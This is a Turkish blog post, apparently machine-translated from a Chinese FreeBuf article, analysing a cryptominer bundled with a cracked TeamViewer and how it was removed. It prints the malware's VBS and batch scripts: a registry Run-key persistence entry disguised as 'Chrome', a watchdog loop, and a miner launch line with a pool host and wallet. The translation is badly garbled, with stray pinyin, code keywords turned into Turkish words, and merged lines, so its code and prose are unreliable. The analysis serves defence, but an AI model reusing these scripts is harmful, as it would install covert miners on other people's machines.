0 × 0 hikaye arka planı
Son zamanlarda, belirli bir dahili ağ sunucusu (tiao) hizmet (ban) cihazını (ji) uzaktan yönetme ihtiyacı var. Genel ağa eşlemek güvenli değil. Sonuçta, çok fazla siyah şapka var. Bunu düşündükten sonra, hala bir Teamviewer kurmanın dürüst olduğunu hissediyorum. En güvenilir olan Du Niang, indirilebilecek gerçekten çok sayıda kırılmış sürüm kaynağı olduğunu buldu, bu nedenle işlemi başlatmak için istediği zaman kırık bir sürümü indirdi.
0 × 1 kurulum süreci
Önce dosya açıklamasına bakın ve hiçbir sorun bulunmaz, bu nedenle bir sonraki adım yüklemektir.
Kurulum tamamlandıktan sonra işlevler normal, her şey yolunda ve yavaş yavaş bilgisayar patlamaya başlıyor ve hassas beyaz şapka kötü bir his veriyor.
0 × 2 sorun giderme
İşlem listesini dikkatlice kontrol etmeye başladım. Sonunda garip bir işlem buldum. Aslında bir madencilik virüsü implante edilmişti. Bu çok açık. İşlem enjeksiyon dosyasız saldırıları gibi üst düzey teknolojilerle uğraşmadım. Çok daha fazla .bat ve .vbs dosyası.
Madencilik sürecini doğrudan bitirdikten sonra otomatik olarak tekrar başlayacak, bakalım bu yoldaşlarda neler yazılıyor.
0.Servicecrsssr.vbs: im WShellSet WShell = CreateObject ("WScript.Shell") WShell.Run "% windir% \ winvprse.bat", 0Set WShell = Hiçbir şey1. Winprs.bat:
@Echo OffREG ADD HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ run / v "Chrome" / f / t REG_SZ / d "% windir% \ servicecrsssr.vbs" Çıkış2. Winvpr.vbs:
im WShellSet WShell = CreateObject ("WScript.Shell") WShell.Run "winprs.bat", 0Set WShell = Hiçbir şey3. Winvprse.bat:
@echo offSETLOCAL EnableExtensions: starttimeout / t 160 / nobreak > NULecho offtasklist / FI "IMAGENAME eq wmipvrse.exe" 2 > NUL | / I / N "wmipvrse.exe" dosyasını bulun > NULif "% ERRORLEVEL%" == "0" starttasklist / FI "IMAGENAME eq wmipvrse.exe" 2 > NUL | / I / N "wmipvrse.exe" dosyasını bulun > NULif "% ERRORLEVEL%" == "1" işleme gitmiyor: processnotrunningstart "" "% windir% \ xdgaudio.vbs" startexit'e git4.xdgaudio.vbs
Dim WShell Ayarla WShell = CreateObject ("WScript.Shell") WShell.Run "wmipvrse.exe --cpu-öncelik 2 --cpu-affinity 2 -a cryptonight -o katman + tcp: //krb.crypto-coins.club: 5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -px ", 0 Set WShell = Hiçbir Şey5. Wmipvrse.exe
Madencilik havuzları ve cüzdanları böyle çıktı, bakalım ne kadar para kazıldı.
0 × 3 ters analiz
Hala Wmipvrse.exe sürecindeki şeyleri merak ediyordum, bu yüzden bir göz atmaya karar verdim.Paketlendi, ancak neyse ki, UPX'in standart kabuğu doğrudan çıkarılabilir.
CPU-miner github'da açık kaynak kodu
0 × 4 virüs temizleme
Olduğu gibi, birkaç vbs ve bat dosyasının içeriğine göre, çalışma prensibi nispeten açık, bu yüzden temizlemeye başladım.
Adım 1: 6 ana virüsü silmek için PCHunter'ı kullanın
servicecrsssr.vbs Winprs.bat Winvpr.vbs Winvprse.bat Wmipvrse.exe xdgaudio.vbsAdım 2: Kayıt defterini temizleyin
0 × 5 özet
1. Resmi platformlardan veya güvenilir üçüncü taraf yazılım platformlarından yazılım indirmeyi deneyin.
2. Dünyada bedava öğle yemeği yok Yazılımın crackli sürümü sizi şaşırtacak bazı virüs ve Truva atı arka kapıları içerebilir, büyük bir hediye paketi olabilir.
3. Güvenlik küçük bir mesele değildir, günlük ilgi gösterilmelidir.
* Yazar: si1ence, yeniden oluşturulmuş, lütfen FreeBuf.COM'dan belirtin